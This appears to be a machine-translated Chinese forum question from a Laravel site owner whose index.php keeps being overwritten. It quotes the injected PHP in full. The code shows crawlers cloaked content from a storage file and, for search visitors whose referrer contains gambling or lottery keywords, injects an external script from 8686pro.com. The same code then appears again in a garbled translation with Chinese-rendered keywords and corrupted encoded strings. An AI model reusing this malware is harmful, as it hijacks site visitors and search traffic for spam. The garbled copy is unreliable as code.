360 Spider Bot在现场laravel项目的存储文件夹中创建了文件
在我的实时站点上,有人将文件上传到存储文件夹中 甚至他也没有访问Cpanel或FTP的权限 但我的index.php总是用一些原始代码编写过度360 Spider Bot在现场laravel项目的存储文件夹中创建了文件,laravel,.htaccess,robots.txt,Laravel,.htaccess,Robots.txt,在我的实时站点上,有人将文件上传到存储文件夹中 甚至他也没有访问Cpanel或FTP的权限 但我的index.php总是用一些原始代码编写过度 function _spider() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiderArr = array('360spider', 'so', 'soso', 'bing', 'sogou', 'sm', 'yahoo'); foreach($spiderArr
function _spider() {
$agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$spiderArr = array('360spider', 'so', 'soso', 'bing', 'sogou', 'sm', 'yahoo');
foreach($spiderArr as $v) {
if(strpos($agent, $v) !== false) {
return true;
}
}
$hostname = strtolower(gethostbyaddr(@$_SERVER['REMOTE_ADDR']));
$spiderArr = array('sogouspider', 'hn.kd.ny.adsl', 'msnbot');
foreach($spiderArr as $v) {
if(strpos($hostname, $v) !== false) {
return true;
}
}
}
function _main() {
$index = strtolower($_SERVER['SCRIPT_NAME']);
$indexArr = array('index', 'default', 'home', 'safe');
foreach($indexArr as $v) {
if(strpos($index, $v) !== false) {
return true;
}
}
}
function _from() {
$referer = strtolower(@$_SERVER['HTTP_REFERER']);
if(empty($referer)) {
return false;
}
$refeerArr = array('so.com', '360', 'soso', 'bing', 'sogou' ,'sm', 'yahoo');
foreach($refeerArr as $v) {
if(strpos($referer, $v) !== false) {
return true;
}
}
}
function _keywords() {
$referer = strtolower(@$_SERVER['HTTP_REFERER']);
if(empty($referer)) {
return false;
}
$refeerArr = array('%C1%F9','%E5%85%AD','%BA%CF','%E5%90%88','%BA%CD','%E5%92%8C','%B2%CA','%E5%BD%A9','%CC%D8','%E7%89%B9','%C2%EB','%E7%A0%81','%BD%B1','%E5%A5%96','%C6%DA','%E6%9C%9F','%D0%A4','%E8%82%96','%CD%BC','%E5%9B%BE','lhc','lhc','%CF%E3%B8%DB','%E9%A6%99%E6%B8%AF','6%BA%CF','6%E5%90%88','%C2%ED%BB%E1','%E9%A9%AC%E4%BC%9A','%CC%D8%C2%EB','%E7%89%B9%E7%A0%81','%C2%DB%CC%B3','%E8%AE%BA%E5%9D%9B','%C1%F9%BA%CF','%E5%85%AD%E5%90%88','%BF%AA%BD%B1','%E5%BC%80%E5%A5%96','%BD%E1%B9%FB','%E7%BB%93%E6%9E%9C','%CD%BC%BF%E2','%E5%9B%BE%E5%BA%93','%D0%C4%CB%AE','%E5%BF%83%E6%B0%B4','%B9%DC%BC%D2%C6%C5','%E7%AE%A1%E5%AE%B6%E5%A9%86','%B0%D7%D0%A1%BD%E3','%E7%99%BD%E5%B0%8F%E5%A7%90','%D7%DF%CA%C6%CD%BC','%E8%B5%B0%E5%8A%BF%E5%9B%BE','%C0%CF%C7%AE%D7%AF','%E8%80%81%E9%92%B1%E5%BA%84','%D4%F8%B5%C0%C8%CB','%E6%9B%BE%E9%81%93%E4%BA%BA','%BF%AA%BD%B1%D6%B1%B2%A5','%E5%BC%80%E5%A5%96%E7%9B%B4%E6%92%AD','%B1%BE%C6%DA','%E6%9C%AC%E6%9C%9F','%D6%B1%B2%A5','%E7%9B%B4%E6%92%AD','%D7%CA%C1%CF','%E8%B5%84%E6%96%99','%CF%D6%B3%A1','%E7%8E%B0%E5%9C%BA','%BC%C7%C2%BC','%E8%AE%B0%E5%BD%95','%B1%A8','%E6%8A%A5','%CD%BC%D6%BD','%E5%9B%BE%E7%BA%B8','%CD%F8%D6%B7','%E7%BD%91%E5%9D%80','%B4%F3%C8%AB','%E5%A4%A7%E5%85%A8','%D0%FE%BB%FA','%E7%8E%84%E6%9C%BA','%D4%A4%B2%E2','%E9%A2%84%E6%B5%8B','%B9%AB%CA%BD','%E5%85%AC%E5%BC%8F','%BA%C5%C2%EB','%E5%8F%B7%E7%A0%81','%B5%D8%CF%C2','%E5%9C%B0%E4%B8%8B','%B9%D2%C5%C6','%E6%8C%82%E7%89%8C','%B2%D8%B1%A6','%E8%97%8F%E5%AE%9D','%C3%E2%B7%D1','%E5%85%8D%E8%B4%B9','%C0%FA%CA%B7','%E5%8E%86%E5%8F%B2','%CC%EC%CF%DF','%E5%A4%A9%E7%BA%BF','%CC%FA%CB%E3%C5%CC','%E9%93%81%E7%AE%97%E7%9B%98','%BA%EC%BD%E3','%E7%BA%A2%E5%A7%90','%D0%C4%BE%AD','%E5%BF%83%E7%BB%8F','%e9%87%91%e5%a4%9a%e5%ae%9d','%bd%f0%b6%e0%b1%a6','%e4%ba%8c%e5%8d%81%e5%85%ad','%b6%fe%cb%c4%c1%f9','%e5%a4%a9%e7%a9%ba','%cc%ec%bf%d5','%e5%87%8c%e6%b3%a2','%c1%e8%b2%a8','%e7%ba%a2','%ba%ec','%e8%93%9d','%c0%b6','%e7%bb%bf','%c2%cc','%e4%ba%94%e8%a1%8c','%ce%e5%d0%d0','%e8%b7%91%e7%8b%97','%c5%dc%b9%b7','%e5%9b%9b%e4%b8%8d%e5%83%8f','%cb%c4%b2%bb%cf%f1','%e4%b8%ad','%d6%d0','mahui','tema','xianggang');
foreach($refeerArr as $v) {
if(stripos($referer, $v) !== false) {
return true;
}
}
}
if(_spider() && _main()) {
@ob_end_clean();
echo @file_get_contents('./storage/zhuayt.gif');
echo '<!--'.date('Y-m-d H:i:s').'-->';
@ob_end_flush();
exit();
}
if(_keywords()){
if(_from()){
@ob_end_clean();
echo '<script language="javascript" src="https://www.8686pro.com/aa.js"></script><br/>';
@ob_end_flush();
exit();
}
}
header("Content-Type: text/html; charset=gb2312");
函数_spider(){
$agent=strtolower($\服务器['HTTP\用户\代理]);
$spiderArr=数组('360spider','so','soso','bing','sogou','sm','yahoo');
foreach($spiderArr作为$v){
if(strpos($agent,$v)!==false){
返回true;
}
}
$hostname=strtolower(gethostbyaddr(@$_SERVER['REMOTE_ADDR'));
$spiderArr=array('sogouspider','hn.kd.ny.adsl','msnbot');
foreach($spiderArr作为$v){
if(strpos($hostname,$v)!==false){
返回true;
}
}
}
函数_main(){
$index=strtolower($_服务器['SCRIPT_NAME']);
$indexArr=array('index','default','home','safe');
foreach($v为索引){
if(strpos($index,$v)!==false){
返回true;
}
}
}
函数_from(){
$referer=strtolower(@$_SERVER['HTTP_referer']);
if(空($referer)){
返回false;
}
$refeerArr=array('so.com','360','soso','bing','sogou','sm','yahoo');
foreach($refeerArr作为$v){
if(strpos($referer,$v)!==false){
返回true;
}
}
}
函数_关键字(){
$referer=strtolower(@$_SERVER['HTTP_referer']);
if(空($referer)){
返回false;
}
$refeerArr=数组“C1%F9',(%C1%F9 9',,%E5%5%5%85%10%10%9%8,,,%BA%CD,,%E5%92%8C,,,%B2%Ca9%7%F9',,,%C1%9%9%9%9%9.9%7%5%5%5%5%5%9%9%9%7%9%9%10%9%9%7%9%9%9%广告',,,,,,%5%5%7%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%99%E6%B8%AF','6%BA%CF','6%E5%90%88','%C2%ED%BB%E1','%E9%A9%AC%E4%BC%9A','%CC%D8%C2%EB','%E7%89%B9%E7%A0%8.8%的A8%的A8%的A8%的A8%的A8%的A8%的A8%的A9%的Ba9%的C7%的F9%的Ba6%的CF,,,,,%E5%的85%的85%的A5%的A5%的A5%的A9%的A9%的10%的10%的10%的10%的10%的A9%的10%的A7%的A7%的A9%的A7%的A7%的10%的A7%的10%的10%的Ba7%的10%的10%的Ba7%的10%的Ba7%的10%的10%的C7%的10%的10%的C7%的C7%的C7%的C7%的C7%的C7%的C7%的C7%的10%的10%的C7%的C7%的C7%的C7%的C7%的AE%A1%E5%AE%B6%E5%A9%86'、'%B0%D7%D0%A1%BD%E3'、'%E7%99%BD%E5%B0%8F%E5%A7%90'、'%D7%DF%CA%C6%CD%BC'、'%E8%7.7%A7%7%A7%的7%A7%A7%的7%AF,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E8%8%80%80%81%81%81%81%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%9%E9%E9%9%9%9%9%9%9%9%9%E9%9%9%9%9%9%9%9%9%9%E9%9%9%9%9%9%9%9%9%B1%B2%A5'、'%E7%9B%B4%E6%92%AD'、'%D7%CA%C1%CF'、'%E8%B5%84%E6%96%99'、'%CF%D6%B3%A1'、'%E7%8E%B0%E5%9C%BA'、'%BC%C7%C2%B“E8%A8,,,,'%E8%A8%A8%8%8%A8,,'%E6%8A%5,,'%CD%BC%D6%BD,,,'%E5%9%B%B%5%B%5%B%B%7%7%7%7%7%7%8%8%8%8%8%A8%8%8%8%8%8%8%8%8%8%8%8%8%5%8%8%8%8%5%8%8%8%8%8%8%8%5%8%8%8%8%8%8%8%8%8%8%8%8%8%8%5%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%CA%BD','%E5%85%AC%E5%BC%8F','%BA%C5%C2%EB','%E5%8F%B7%E7%A0%81','%B5%D8%CF%C2','%E5%9C%B0%E4%B8%8B','%B9%D2%C6','%8.8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%6%8%7%5%6%5%8%6%5%6%5%6%6%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8 A2%E5%A7%90','%D0%C4%BE%AD','%E5%BF%83%E7%BB%8F','%E9%87%91%E5%A4%9a%E5%AE%9D','%BD%f0%b6%e0%B1%A6','%e4%BA%8C%e5%a4%a9%a9%a9%A7%a9%A7%A7%7%7%7%9%A7%A7%7%A7%7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%7%7%7%A7%A7%7%7%7%7%7%A7%7%A7%A7%7%7%7%7%7%7 dc%b9%b7'、'%e5%9b%9b%e4%b8%8d%e5%83%8f'、'%cb%c4%b2%bb%cf%f1'、'%e4%b8%ad'、'%d6%d0'、'mahui'、'tema'、'Xiangang');
foreach($refeerArr作为$v){
if(stripos($referer,$v)!==false){
返回true;
}
}
}
如果(_spider()&&&_main()){
@ob_end_clean();
echo@file_get_内容('./storage/zhuayt.gif');
回声';
@ob_end_flush();
退出();
}
如果(_关键字()){
如果(_from()){
@ob_end_clean();
回声“
”;
@ob_end_flush();
退出();
}
}
标题(“内容类型:text/html;字符集=gb2312”);
请帮助这意味着可能有人能够以某种方式加载自定义代码,这可能是由应用程序中的安全漏洞造成的。噢,谢谢你救了我,伙计,我不知道这件事